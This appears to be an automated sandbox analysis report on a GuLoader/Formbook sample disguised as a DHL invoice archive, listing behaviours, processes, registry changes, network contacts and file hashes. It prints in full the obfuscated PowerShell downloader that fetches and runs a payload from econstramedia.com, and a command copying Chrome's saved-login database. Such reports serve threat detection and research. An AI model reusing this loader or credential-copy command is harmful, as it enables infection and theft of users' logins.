Malware Analysis Report

2024-10-19 09:28

Sample ID 240712-ljvhcsxfpn
Target 12072024_0934_11072024_DHL Invoice.rar
SHA256 8c03f35fb24c46bd75a0fafc7aae84dadc959bf407dea9a6959a7d0ef9f11ca0
Tags
execution formbook guloader dd01 downloader persistence rat spyware stealer trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

8c03f35fb24c46bd75a0fafc7aae84dadc959bf407dea9a6959a7d0ef9f11ca0

Threat Level: Known bad

The file 12072024_0934_11072024_DHL Invoice.rar was found to be: Known bad.

Malicious Activity Summary

execution formbook guloader dd01 downloader persistence rat spyware stealer trojan

Formbook

Guloader, Cloudeye

Formbook payload

Adds policy Run key to start application

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-12 09:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-12 09:34

Reported

2024-07-12 09:36

Platform

win7-20240704-en

Max time kernel

148s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (58 identical rows)

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. 
Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. 
Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. 
PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp (58 identical rows)

Files

memory/2496-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2496-5-0x000000001B780000-0x000000001BA62000-memory.dmp

memory/2496-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2496-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2496-13-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2496-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-12 09:34

Reported

2024-07-12 09:36

Platform

win10v2004-20240709-en

Max time kernel

147s

Max time network

143s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Guloader, Cloudeye

downloader guloader

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\X8AP1N18K8P = "C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" C:\Windows\SysWOW64\svchost.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2240 set thread context of 3428 N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Windows\Explorer.EXE
PID 3244 set thread context of 3428 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\Explorer.EXE

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Windows\SysWOW64\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 identical rows)
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A (3 identical rows)
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A (4 identical rows)
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A (46 identical rows)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A (15 identical rows)
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A (3 identical rows)
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A (4 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A (8 identical rows)
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A (8 identical rows)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1444 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 448 wrote to memory of 4928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe (2 identical rows)
PID 448 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)
PID 1984 wrote to memory of 604 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe (3 identical rows)
PID 1984 wrote to memory of 416 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 3424 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 2616 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 4064 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 2824 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 4348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 3348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 4080 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 1512 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 4820 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 4052 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe (3 identical rows)
PID 1984 wrote to memory of 832 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe (3 identical rows)
PID 1984 wrote to memory of 812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe (3 identical rows)
PID 1984 wrote to memory of 4044 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe (3 identical rows)
PID 1984 wrote to memory of 2240 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe (5 identical rows)
PID 3428 wrote to memory of 3244 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\svchost.exe (3 identical rows)
PID 3244 wrote to memory of 2580 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\cmd.exe (3 identical rows)
PID 3244 wrote to memory of 3880 N/A C:\Windows\SysWOW64\svchost.exe C:\Program Files\Mozilla Firefox\Firefox.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Windows\SysWOW64\autochk.exe

"C:\Windows\SysWOW64\autochk.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Windows\SysWOW64\svchost.exe"

C:\Windows\SysWOW64\cmd.exe

/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V

C:\Program Files\Mozilla Firefox\Firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.216.211.103.in-addr.arpa udp
IN 103.211.216.55:443 econstramedia.com tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 www.x6hk8.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.cindcxyshirts.shop udp
US 104.21.93.64:80 www.cindcxyshirts.shop tcp
US 8.8.8.8:53 64.93.21.104.in-addr.arpa udp
US 104.21.93.64:80 www.cindcxyshirts.shop tcp
US 104.21.93.64:80 www.cindcxyshirts.shop tcp
US 8.8.8.8:53 www.limbicmindset.com udp
US 3.33.130.190:80 www.limbicmindset.com tcp
US 8.8.8.8:53 190.130.33.3.in-addr.arpa udp
US 3.33.130.190:80 www.limbicmindset.com tcp
US 3.33.130.190:80 www.limbicmindset.com tcp
US 8.8.8.8:53 www.vnddq.biz udp
HK 20.2.168.177:80 www.vnddq.biz tcp
US 8.8.8.8:53 177.168.2.20.in-addr.arpa udp
HK 20.2.168.177:80 www.vnddq.biz tcp
HK 20.2.168.177:80 www.vnddq.biz tcp
US 8.8.8.8:53 www.clearconceptslearning.com udp
US 34.149.87.45:80 www.clearconceptslearning.com tcp
US 8.8.8.8:53 45.87.149.34.in-addr.arpa udp
US 34.149.87.45:80 www.clearconceptslearning.com tcp
US 34.149.87.45:80 www.clearconceptslearning.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qknwf5f4.wlw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Aerosoldaasen.Com

MD5 0297ce57c232a13444390269f1a9ea8c
SHA1 718c8339e362670e5ba20bec7f3f81d7ef4caed9
SHA256 f67a6e89cac1951035fe6d5a477641bb80bf1f3b4c88f4b125e4bf7a15fea679
SHA512 6e3d4a24d3591973609296b6a0a2cc563556e225b0fda191a556e3e95ff40305f8692c563e10bce3853f99445f26073364338354c582c3688f6d4fa28aa99527

C:\Users\Admin\AppData\Local\Temp\DB1

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logri.ini

MD5 d63a82e5d81e02e399090af26db0b9cb
SHA1 91d0014c8f54743bba141fd60c9d963f869d76c9
SHA256 eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae
SHA512 38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrf.ini

MD5 2f245469795b865bdd1b956c23d7893d
SHA1 6ad80b974d3808f5a20ea1e766c7d2f88b9e5895
SHA256 1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361
SHA512 909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrg.ini

MD5 4aadf49fed30e4c9b3fe4a3dd6445ebe
SHA1 1e332822167c6f351b99615eada2c30a538ff037
SHA256 75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56
SHA512 eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrv.ini

MD5 bbc41c78bae6c71e63cb544a6a284d94
SHA1 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a
SHA256 ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb
SHA512 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

C:\Users\Admin\AppData\Roaming\J104S8QS\J10logim.jpeg

MD5 5293effc66c000f03ef08f79303f02f3
SHA1 71ab910b8d8e88db066adf2ed7d66cc01c33d1fa
SHA256 1f65c99a30a05ab9c513790e59eaba8c00643629692dd794f74b9f0e2373efe7
SHA512 ff792e81e4fbe29fac826fe92d2ccd15480f43ecb3919d7bb7a33ab155aab75d0e0bcfb72d46ad3fde9d89363d93480a036189e67b45d61585a6de4b0d78915e